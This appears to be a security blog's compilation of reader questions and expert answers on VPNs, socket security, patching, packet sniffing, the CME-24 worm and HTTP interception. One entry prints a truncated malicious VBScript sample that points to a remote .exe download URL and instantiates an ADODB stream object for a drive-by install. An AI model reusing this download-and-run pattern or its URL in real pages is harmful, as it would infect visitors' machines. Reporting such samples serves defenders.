Q: Cisco Site to Site VPN

New week a new question, in this case the question is a bit more generic and I believe raises a few dilemmas, feel free to take a shot at it:

Hi Experts,

Is it secure to just configure Cisco IPSEC/GRE site to site tunnel without firewall/IPS/IDS. The argument here is although it is internet facing, there is only a host to host routing between the routers and the default route goes to the tunnel. Am I right to say that it is technically secure since the router only route traffic between the designated routers?

Thanks in advance.

J. O.


Q: Socket Security

A new question for you guys – you have been great answering the previous one:
Hi I’m a bit new to java and socket programming.
Anyway I just wrote a client server socket program and I have an open port listening on my unix box.

I was told that this is vulnerable because now anyone could write a client side program to my open port and send in whatever command line they want.

I am not sure where to go about researching what security measures I need to put in place for socket programming.



Q: Network Monitoring

Dear Expert,

I am a Network Engineer at the University of Anonymous. I’m not sure if this is an irrelevant question, but here it is any way..

I want to have a Network Monitoring Software with the following characteristics

1 – I want to be able to monitor all the active workstations in each of the Labs.
2 – I want to have a list of trusted MAC addresses. I need this because I want to block any non-trusted device from accessing network resources. Exceptions might be given when the device is verified to be secure..
3 – I want to be able to detect any suspicious activities (pining, high traffic) and Block the associated IP address.

So please, tell me if there is any software of combination of software that enable me to do what I want..

I hope I will hear from you soon



Our readers have been very helpful to person who wrote the previous post, I believe our readers have the answer in this case as well, and as in the previous case, further, the combined answer was way better than anything we could have provided.

So I am going to let our readers answer this interesting question. Readers – what do you say?


Q: Restricted user rights and vulnerabilities

Dear Expert,

I know that a restricted user is less vulnerable to most exploits but is knowing that your users have restricted access enough of a reason NOT to patch? I am advocating that my IT support team update/ patch the following software for our end users; QuickTime, Java, Adobe Reader and Acrobat. Currently all of our installed versions have multiple known vulnerabilities. I am being told patching is unnecessary because 95% of our users have restricted user rights and therefore cannot be exploited.

Will you please clarify? I understand how restricted user rights increases security, but is that enough of a layer to justify not patching. When I inquired about scanning thumb drives, this same answer is given, “It is not necessary because the users have restricted rights.” Many of our users have access to confidential and sensitive data and I remain concerned. I really appreciate any assistance that you can provide on this issue. Thank you for your help.

Anonymous University

A: I am going to let our readers answer this interesting question. Readers – what do you say?


Malware utilizes AJAX to install itself

One of our customers have brought this HTML based malware to our attention:

[script language="VBScript"]
on error resume next

‘ due to how ajax works, the file MUST be within the same local domain
dl = “http://grupo-arroba.by.ru/grupo.exe”

‘ create adodbstream object
Set df = document.createElement(“object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
Set x = df.CreateObject(str,”")


Packet Sniffing


We recently had two sites defaced on our servers, and the perpetrators are claiming to have used TCPDump. Is there a cheap way to encrypt the data packets to ensure they can’t be sniffed? … [snipped]

- Rob


The easiest way to encrypt data between you and the server is to use SSL or SSH. If you are connecting to a web server, enable SSL encryption, if you are connecting to a service that can be protected by SSL, enable it.

If you can’t use SSL encryption in your product, you can use OpenSSH for tunneling of traffic to the destination host, or use OpenVPN (SSL based) to encrypt the connection between you and the destination host.


CME 24


Hope you can help with this question.

If a computer is infected with CME 24 will it attempt to attack a mapped network drive?
Not just delivering its payload.




Lets first try to understand what CME 24 is, CME – Common Malware Enumeration – is a relatively new standard in the way malwares are identified and sorted.

CME allows different vendors, such as: Aladdin Knowledge Systems, Authentium, Avira, CA, ClamAV, ESET, Fortinet, Grisoft, H+BEDV, iDefense, Kaspersky, McAfee, Microsoft, TrojanDownloader, Norman, Panda, Sophos, Symantec, and Trend Micro to name the malware they identify in such a way that the user can know that the Malware ‘X’ that company A has found is the same Malware named ‘Y’ that company B finds.

CME 24, which is also been named by the different vendors as,
Aladdin Knowledge Systems: Win32.Blackmal.e
Authentium: W32/Kapser.A@mm
CA: Win32/Blackmal.F
Fortinet: W32/Grew.A!wm
F-Secure: Nyxem.E
Grisoft: Worm/Generic.FX
H+BEDV: Worm/KillAV.GR
Kaspersky: Email-Worm.Win32.Nyxem.e
McAfee: W32/MyWife.d@MM
Microsoft: Win32/Mywife.E@mm!CME-24
Norman: W32/Small.KI
Panda: W32/Tearec.A.worm
Sophos: W32/Nyxem-D
Symantec: W32.Blackmal.E@mm
TrendMicro: WORM_GREW.A

Destroy certain data files on an infected user’s machine on Friday, February 3, 2006.

According to our sources and independent analysis conducted on this worm, have revealed that the code should have destroyed. However, it is apparent that ITW (In the Wild) the worm’s payload does not function correctly making it unable to destroy content found on mapped drives.


HTTP PUT Malware


Hello -

I’m assessing the vulnerability of a web service application, and have been trying to find out whether this sort of scenario is possible, and if so, what to do about it.

Is there any sort of malware that could be installed on a user’s PC, such that it would intercept non-browser based HTTP requests (consisting of data to be PUT), send this data to a site run by the malware authors, and then issue the PUT to the intended web site? The effect being that the data is sent to the correct web site, but a copy is also sent to another location, unbeknownst to the user.

If this is possible, would HTTPS circumvent this?

I’ve searched and searched but cannot find anything addressing this.



What you are describing sounds like a Proxy server. In essence, proxies receive requests made by the user, send them to their original destination, receive the response from the destination and redirect that response to the user.

The use of a PUT requests to implement this is the first time I have heard of it, however it is not something that would be impossible to do.

For Proxy servers – HTTPS might trigger a warning on the part of the proxy as the certificate of the web site being accessed would be different from that of the proxy server from which you are receiving the HTTPS traffic back.

For Malware – As no traffic is being sent to the real destination, HTTPS or HTTP would make no difference. In both cases your traffic is being modified and possibly manipulated. Mozilla/IE might detect this manipulation and might not, I cannot be certain.